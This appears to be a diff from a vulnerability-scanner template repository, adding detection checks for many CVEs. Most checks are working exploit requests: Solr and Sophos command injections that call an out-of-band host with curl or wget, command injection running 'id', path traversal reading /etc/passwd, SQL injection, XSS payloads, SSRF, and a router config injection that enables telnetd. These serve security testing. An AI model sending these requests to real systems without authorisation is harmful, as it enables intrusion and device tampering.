condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'

4
cves/2019/CVE-2019-16332.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332
reference: |
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:

41
cves/2019/CVE-2019-17558.yaml
View File

@ -4,7 +4,7 @@ info:
author: pikpikcu,madrobot
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
@ -15,15 +15,10 @@ requests:
Connection: close
- |
POST /solr/{{collection}}/config HTTP/1.1
POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 259
Upgrade-Insecure-Requests: 1
{
"update-queryresponsewriter": {
@ -37,25 +32,25 @@ requests:
}
- |
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
name: collection
group: 1
internal: true
matchers:
- type: word
words:
- "Non-authoritative answer"
- "example.com"
condition: and
name: core
group: 1
regex:
- '"name"\:"(.*?)"'

2
cves/2019/CVE-2019-20085.yaml
View File

@ -13,7 +13,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
- "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and
matchers:

2
cves/2019/CVE-2019-3401.yaml
View File

@ -3,8 +3,10 @@ id: CVE-2019-3401
info:
name: Atlassian JIRA Information Exposure (CVE-2019-3401)
author: TechbrunchFR,milo2012
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
severity: info
tags: cve,cve2019,jira,atlassian
reference: https://jira.atlassian.com/browse/JRASERVER-69244
requests:
- method: GET

32
cves/2019/CVE-2019-7238.yaml Normal file
View File

File diff suppressed because one or more lines are too long

18
cves/2019/CVE-2019-8451.yaml
View File

@ -8,17 +8,23 @@ info:
reference:
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793
tags: cve,cve2019,atlassian,jira,ssrf
- https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf,oob
requests:
- method: GET
- method: POST
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers:
X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
name: ssrf-response-body
part: interactsh_protocol
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- "http" # Confirms the HTTP Interaction

26
cves/2020/CVE-2019-9618.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2019-9618
info:
name: GraceMedia Media Player 1.0 - Local File Inclusion
author: 0x_Akoko
severity: critical
reference: |
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

4
cves/2020/CVE-2020-13927.yaml
View File

@ -3,7 +3,7 @@ id: CVE-2020-13927
info:
name: Unauthenticated Airflow Experimental REST API
author: pdteam
severity: medium
severity: critical
tags: cve,cve2020,apache,airflow,unauth
requests:
@ -17,4 +17,4 @@ requests:
- '"dag_run_url":'
- '"dag_id":'
- '"items":'
condition: and
condition: and

6
cves/2020/CVE-2020-24312.yaml
View File

@ -17,6 +17,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'
matchers-condition: and
matchers:
- type: status
@ -25,4 +26,7 @@ requests:
- type: word
words:
- 'Index of'
- 'Index of'
- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
- 'backup_'
condition: and

36
cves/2020/CVE-2020-25223.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2020-25223
info:
name: Sophos UTM - Preauth RCE
author: gy741
severity: critical
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
reference: |
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
tags: cve,cve2020,sophos,rce,oob
requests:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

26
cves/2020/CVE-2020-27361.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-27361
info:
name: Akkadian Provisioning Manager - Files Listing
author: gy741
severity: high
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
tags: cve,cve2020,akkadian,listing,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/media/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /pme/media"
- "Parent Directory"
condition: and
- type: status
status:
- 200

8
cves/2020/CVE-2020-35489.yaml
View File

@ -26,5 +26,11 @@ requests:
- type: regex
regex:
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) ='
- '^== Changelog =="'
part: body
- type: regex
regex:
- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
negative: true
part: body

27
cves/2020/CVE-2020-35598.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Path Traversal
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: |
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

40
cves/2020/CVE-2020-6637.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-6637
info:
name: OpenSIS v7.3 unauthenticated SQL injection
author: pikpikcu
severity: high
description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
tags: cve,cve2020,sqli,opensis
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
- https://cinzinga.com/CVE-2020-6637/
requests:
- method: POST
path:
- '{{BaseURL}}/account/index.php'
- '{{BaseURL}}/opensis/index.php'
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded
body: |
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SQL STATEMENT:'
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
condition: and
- type: word
part: header
words:
- "text/html"
condition: and
- type: status
status:
- 200

25
cves/2020/CVE-2020-7796.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
reference: |
- https://www.adminxe.com/2183.html
tags: cve,cve2020,zimbra,ssrf,oob
requests:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

33
cves/2021/CVE-2021-20090.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2021-20090
info:
name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741
severity: critical
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'URLToken(cgi_path)'
- 'pppoe'
- 'wan'
condition: and

47
cves/2021/CVE-2021-20091.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-20091
info:
name: Buffalo WSR-2533DHPL2 - Configuration File Injection
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
POST /images/..%2fapply_abstract.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
Content-Type: application/x-www-form-urlencoded
action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/Success.htm"
- type: status
status:
- 302
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='

55
cves/2021/CVE-2021-20092.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2021-20092
info:
name: Buffalo WSR-2533DHPL2 - Improper Access Control
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/x-javascript"
- type: word
words:
- "/*DEMO*/"
- "addCfg("
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='

4
cves/2021/CVE-2021-21389.yaml
View File

@ -7,7 +7,9 @@ info:
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference:
- https://github.com/HoangKien1020/CVE-2021-21389
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
tags: cve,cve2021,wordpress,wp-plugin,rce

28
cves/2021/CVE-2021-21816.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-21816
info:
name: D-LINK DIR-3040 - Syslog Information Disclosure
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
author: gy741
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
requests:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
part: body
condition: and
- type: status
status:
- 200

31
cves/2021/CVE-2021-24235.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2021-24235
info:
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
matchers-condition: and
matchers:
- type: word
words:
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
cves/2021/CVE-2021-24320.yaml
View File

@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
reference: |
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:

17
cves/2021/CVE-2021-26855.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
tags: cve,cve2021,ssrf,rce,exchange,oob
reference:
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
@ -18,19 +18,10 @@ requests:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
matchers-condition: and
matchers:
- type: status
status:
- 500
- 503
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- 'X-Calculatedbetarget: somethingnonexistent'
part: header
- "http"

38
cves/2021/CVE-2021-27561.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-27561
info:
name: YeaLink DM PreAuth RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Unauthenticated Remote Code Execution
tags: cve,cve2021,rce,yealink
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
requests:
- method: GET
path:
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- 'uid'
- 'gid'
- 'groups'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

7
cves/2021/CVE-2021-27905.yaml
View File

@ -26,13 +26,14 @@ requests:
Accept-Language: en
Connection: close
extractors:
- type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
internal: true
name: core
group: 1
internal: true
regex:
- '"name"\:"(.*?)"'
matchers:
- type: word

Some files were not shown because too many files have changed in this diff Show More